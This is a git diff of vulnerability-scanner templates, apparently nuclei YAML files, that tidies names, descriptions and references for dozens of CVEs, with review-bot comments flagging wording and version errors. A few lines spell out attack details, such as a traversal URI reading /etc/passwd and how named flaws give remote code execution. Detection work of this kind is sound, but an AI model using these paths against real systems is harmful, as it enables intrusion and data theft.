@@ -1,14 +1,15 @@ id: CVE-2018-16763 info: - name: fuelCMS 1.4.1 - Remote Code Execution + name: FUEL CMS 1.4.1 - Remote Code Execution author: pikpikcu severity: critical - description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution. + description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. reference: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16763 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -30,3 +31,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index 87e87bd4aa..6557b09070 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -1,13 +1,13 @@ id: CVE-2018-16836 info: - name: Rubedo CMS 3.4.0 - Directory Traversal + name: Rubedo CMS <=3.4.0 - Directory Traversal author: 0x_Akoko severity: critical - description: Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as - demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. reference: - https://www.exploit-db.com/exploits/45385 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 
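Review bot: The edited `description` in cves/2018/CVE-2018-16763.yaml removes "This can lead to Pre-Auth Remote Code Execution.", so the text now mentions only PHP code evaluation. The `name` still says remote code execution and the CVSS vector in the context lines carries PR:N. The missing-authentication condition drives prioritisation for this finding, so the normalised wording should keep it: `description: FUEL CMS 1.4.1 allows PHP code evaluation via the pages/select/ filter parameter or the preview/ data parameter, which can lead to pre-authentication remote code execution.`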
@@ -29,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index 52c604d738..8a33e82710 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml @@ -1,14 +1,13 @@ id: CVE-2018-17246 info: - name: Kibana Local File Inclusion + name: Kibana - Local File Inclusion author: princechaddha severity: critical - description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute - javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md + - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -38,3 +37,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index 30b1f39e38..ae4fdebaa3 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml 
@@ -1,13 +1,14 @@ id: CVE-2018-17431 info: - name: Comodo Unified Threat Management Web Console 2.7.0 - RCE + name: Comodo Unified Threat Management Web Console - Remote Code Execution author: dwisiswant0 severity: critical - description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) + description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -35,4 +36,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-18925.yaml b/cves/2018/CVE-2018-18925.yaml index c79c196fe2..cff6c60e67 100644 --- a/cves/2018/CVE-2018-18925.yaml +++ b/cves/2018/CVE-2018-18925.yaml @@ -1,11 +1,10 @@ id: CVE-2018-18925 info: - name: Gogs - Remote Code Execution (CVE-2018-18925) + name: Gogs (Go Git Service) 0.11.66 - Remote Code Execution author: princechaddha severity: critical - description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related - to session ID handling in the go-macaron/session code for Macaron. + description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. reference: - https://www.anquanke.com/post/id/163575 - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925 
@@ -15,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - remediation: This issue will be fixed by updating to the latest version of Gogs + remediation: This issue will be fixed by updating to the latest version of Gogs. tags: cve,cve2018,gogs,lfi,rce requests: @@ -35,3 +34,5 @@ requests: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 1566a653dc..4da57ce3f1 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -1,13 +1,13 @@ id: CVE-2018-20985 info: - name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion + name: WordPress Payeezy Pay <=2.97 - Local File Inclusion author: daffainfo severity: critical - description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive - information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://wordpress.org/plugins/wp-payeezy-pay/#developers - https://www.cvedetails.com/cve/CVE-2018-20985/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -35,3 +35,6 @@ requests: - type: status status: - 200 + + +# Enhanced by mp on 2022/05/13 
diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index 698150de04..ce5ace24c1 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -1,13 +1,15 @@ id: CVE-2018-2894 info: - name: Oracle WebLogic RCE + name: Oracle WebLogic Server - Remote Code Execution author: geeknik,pdteam severity: critical - description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. reference: - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2894 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -90,3 +92,5 @@ requests: - type: word words: - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index e906d11418..4602a84822 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml 
@@ -1,14 +1,13 @@ id: CVE-2018-3810 info: - name: WordPress Smart Google Code Inserter Authentication Bypass + name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass author: princechaddha severity: critical - description: Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic - parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated - user to successfully update the inserted code. + description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. reference: - https://www.exploit-db.com/exploits/43420 + - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -44,3 +43,6 @@ requests: - type: status status: - 200 + + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml index 60ee965e86..f13dbcb2c2 100644 --- a/cves/2018/CVE-2018-6008.yaml +++ b/cves/2018/CVE-2018-6008.yaml 
@@ -1,10 +1,10 @@ id: CVE-2018-6008 info: - name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download + name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Retrieval author: daffainfo severity: high - description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter. + description: Arbitrary file retrieval exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter. reference: - https://www.exploit-db.com/exploits/43913 - https://www.cvedetails.com/cve/CVE-2018-6008 diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index 55918f1b04..fec50a358e 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -1,13 +1,13 @@ id: CVE-2018-7600 info: - name: Drupal Drupalgeddon 2 RCE + name: Drupal - Remote Code Execution author: pikpikcu severity: critical - description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or - common module configurations. + description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. reference: - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 + - https://nvd.nist.gov/vuln/detail/CVE-2018-7600 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -60,3 +60,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-7602.yaml b/cves/2018/CVE-2018-7602.yaml index d628ce24ba..6964122f03 100644 --- a/cves/2018/CVE-2018-7602.yaml +++ b/cves/2018/CVE-2018-7602.yaml 
@@ -1,11 +1,10 @@ id: CVE-2018-7602 info: - name: Drupal Remote Code Execution Vulnerability + name: Drupal - Remote Code Execution author: princechaddha severity: critical - description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result - in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 @@ -74,3 +73,5 @@ requests: group: 1 regex: - '' + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-7662.yaml b/cves/2018/CVE-2018-7662.yaml index 14742e7d0e..c2cfc5117d 100644 --- a/cves/2018/CVE-2018-7662.yaml +++ b/cves/2018/CVE-2018-7662.yaml @@ -1,7 +1,7 @@ id: CVE-2018-7662 info: - name: CouchCMS <= 2.0 - Full Path Disclosure + name: CouchCMS <= 2.0 - Path Disclosure author: ritikchaddha severity: medium description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. diff --git a/cves/2018/CVE-2018-9161.yaml b/cves/2018/CVE-2018-9161.yaml index 2d6099ae02..d07f2b5e66 100644 --- a/cves/2018/CVE-2018-9161.yaml +++ b/cves/2018/CVE-2018-9161.yaml 
@@ -4,8 +4,7 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be - disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 @@ -33,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-9205.yaml b/cves/2018/CVE-2018-9205.yaml index 11d98cafcc..4c8ae5e70c 100644 --- a/cves/2018/CVE-2018-9205.yaml +++ b/cves/2018/CVE-2018-9205.yaml @@ -1,7 +1,7 @@ id: CVE-2018-9205 info: - name: Drupal avatar_uploader v7.x-1.0-beta8 Local File Inclusion + name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion author: daffainfo severity: high description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files. diff --git a/cves/2019/CVE-2019-16123.yaml b/cves/2019/CVE-2019-16123.yaml index 60bc21c9cb..891b8933e6 100644 --- a/cves/2019/CVE-2019-16123.yaml +++ b/cves/2019/CVE-2019-16123.yaml 
@@ -1,7 +1,7 @@ id: CVE-2019-16123 info: - name: PilusCart <= 1.4.1 - Local File Disclosure + name: PilusCart <= 1.4.1 - Arbitrary File Retrieval author: 0x_Akoko severity: high description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 2b48847efd..bf741b806c 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16759 info: - name: vBulletin v5.0.0-v5.5.4 Remote Command Execution + name: vBulletin v5.0.0-v5.5.4 - Remote Command Execution author: madrobot severity: critical description: vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request. diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 31ca656175..4fadfcfacf 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml 
@@ -1,11 +1,10 @@ id: CVE-2019-17506 info: - name: DLINK DIR-868L & DIR-817LW Info Leak + name: D-Link DIR-868L & DIR-817LW - Information Disclosure author: pikpikcu severity: critical - description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) - via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. + description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. reference: - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py classification: diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml index afefa998c7..6a278ed7a0 100644 --- a/cves/2019/CVE-2019-19908.yaml +++ b/cves/2019/CVE-2019-19908.yaml @@ -1,10 +1,10 @@ id: CVE-2019-19908 info: - name: phpMyChat-Plus XSS + name: phpMyChat-Plus - Cross-Site Scripting author: madrobot severity: medium - description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. + description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. reference: - https://cinzinga.github.io/CVE-2019-19908/ classification: diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml index 832bbf7c41..ab25c58a3d 100644 --- a/cves/2019/CVE-2019-19985.yaml 
+++ b/cves/2019/CVE-2019-19985.yaml @@ -1,10 +1,10 @@ id: CVE-2019-19985 info: - name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download + name: WordPress Email Subscribers & Newsletters <4.2.2 - Arbitrary File Retrieval author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium - description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. + description: The WordPress plugin Email Subscribers & Newsletters before 4.2.3 contains a flaw that allows unauthenticated file download and user information disclosure. reference: - https://www.exploit-db.com/exploits/48698 classification: @@ -37,4 +37,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml index 43ec04b5be..9e3ef70432 100644 --- a/cves/2019/CVE-2019-20141.yaml +++ b/cves/2019/CVE-2019-20141.yaml @@ -1,7 +1,7 @@ id: CVE-2019-20141 info: - name: Neon Dashboard - XSS Reflected + name: Neon Dashboard - Cross-Site Scripting author: knassar702 severity: medium description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. @@ -30,4 +30,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index 568b41377e..def2a63d29 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -1,7 +1,7 @@ id: CVE-2019-3912 info: - name: LabKey Server < 18.3.0 - Open redirect + name: LabKey Server < 18.3.0 - Open Redirect author: 0x_Akoko severity: medium description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites. 
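Review bot: The new `name` for CVE-2019-19985 gives the affected range as `<4.2.2`, while the `description` rewritten in the same hunk says the flaw is in versions before 4.2.3. The old name listed `4.2.2` as an affected version, so the new bound excludes a release the description still covers. Anyone triaging scan results by template name would read 4.2.2 as unaffected. I would write `name: WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval` so the two fields agree.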
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml index f6f733783a..7489a0c820 100644 --- a/cves/2019/CVE-2019-9955.yaml +++ b/cves/2019/CVE-2019-9955.yaml @@ -1,7 +1,7 @@ id: CVE-2019-9955 info: - name: Zyxel Reflected Cross-site Scripting + name: Zyxel - Reflected Cross-site Scripting author: pdteam severity: medium description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml index 6952e2c78c..4b2fb2686d 100644 --- a/cves/2020/CVE-2020-18268.yaml +++ b/cves/2020/CVE-2020-18268.yaml @@ -1,7 +1,7 @@ id: CVE-2020-18268 info: - name: Z-BlogPHP 1.5.2 Open redirect + name: Z-BlogPHP 1.5.2 - Open Redirect author: 0x_Akoko severity: medium description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php." diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 8d9da7a121..a642e28b21 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -1,7 +1,7 @@ id: CVE-2020-22840 info: - name: b2evolution CMS Open redirect + name: b2evolution CMS - Open Redirect author: geeknik severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. diff --git a/cves/2020/CVE-2020-24391.yaml b/cves/2020/CVE-2020-24391.yaml index 97c0b1f998..d0bc0cf514 100644 --- a/cves/2020/CVE-2020-24391.yaml +++ b/cves/2020/CVE-2020-24391.yaml 
@@ -1,11 +1,10 @@ id: CVE-2020-24391 info: - name: Mongo-Express Remote Code Execution + name: Mongo-Express - Remote Code Execution author: leovalcante severity: critical - description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed - leading to remote code execution in the context of the node server. + description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. reference: - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index 173fe2c0d3..b7eecbd3ea 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -1,7 +1,7 @@ id: CVE-2020-24550 info: - name: CVE-2020-24550 + name: EpiServer <13.2.7 - Open Redirect author: dhiyaneshDK severity: medium description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index abb9b6e04b..57a6a48383 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml 
@@ -1,7 +1,7 @@ id: CVE-2020-24579 info: - name: DLINK DSL 2888a RCE + name: D-Link DSL 2888a - Remote Command Execution author: pikpikcu severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index b9465d25c0..f3a93f9bfe 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -1,10 +1,10 @@ id: CVE-2020-25495 info: - name: SCO Openserver 5.0.7 - 'section' Reflected XSS + name: SCO Openserver 5.0.7 - 'section' Cross-Site scripting author: 0x_Akoko severity: medium - description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. + description: A reflected cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. reference: - https://www.exploit-db.com/exploits/49300 classification: diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index b8f5f954e6..67ed1506e4 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -1,7 +1,7 @@ id: CVE-2020-29453 info: - name: Jira Server Pre-Auth Limited Arbitrary File Read + name: Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF) author: dwisiswant0 severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 7d146b213f..657ec3c39e 100644 
--- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml @@ -1,7 +1,7 @@ id: CVE-2020-3452 info: - name: CVE-2020-3452 + name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval author: pdteam severity: high description: | diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index 41fd646ab8..a8705ecb15 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -1,10 +1,10 @@ id: CVE-2020-35736 info: - name: GateOne Arbitrary File Download + name: GateOne 1.1 - Arbitrary File Retrieval author: pikpikcu severity: high - description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused. + description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. directory traversal because os.path.join is incorrectly used. reference: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml index 6acaacc696..e8e74fcf2b 100644 --- a/cves/2020/CVE-2020-35749.yaml +++ b/cves/2020/CVE-2020-35749.yaml @@ -1,7 +1,7 @@ id: CVE-2020-35749 info: - name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download + name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated) author: cckuailong severity: high description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml index 1799640cac..7780f22248 100644 --- a/cves/2020/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml 
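Review bot: The new name in CVE-2020-35749 reads `< 2.9.4 -Arbitrary File Retrieval (Authenticated)`, with no space after the separator, which breaks the `Product - Issue` form this commit applies everywhere else. The same slip is in the new names of CVE-2020-9054 (`5.21- Remote Code Execution`) and CVE-2022-0540 (`Seraph- Authentication Bypass`), and the new name of CVE-2020-25495 ends in `Cross-Site scripting` with a lower-case s. Suggested: `name: Simple Job Board < 2.9.4 - Arbitrary File Retrieval (Authenticated)`, with the matching one-character fixes in the other three.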
@@ -1,7 +1,7 @@ id: CVE-2020-36365 info: - name: Smartstore < 4.1.0 - Open redirect + name: Smartstore < 4.1.0 - Open Redirect author: 0x_Akoko severity: medium description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. diff --git a/cves/2020/CVE-2020-36510.yaml b/cves/2020/CVE-2020-36510.yaml index 8ab9e80989..4d82785b67 100644 --- a/cves/2020/CVE-2020-36510.yaml +++ b/cves/2020/CVE-2020-36510.yaml @@ -5,7 +5,7 @@ info: author: veshraj severity: medium description: | - The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting + The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510 